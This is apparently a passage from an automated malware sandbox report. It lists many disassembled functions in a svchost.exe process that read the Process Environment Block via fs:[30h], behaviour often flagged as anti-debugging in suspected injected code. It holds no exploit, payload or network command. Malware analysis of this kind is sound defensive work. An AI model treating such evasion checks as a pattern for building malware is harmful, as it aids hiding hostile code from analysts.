                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
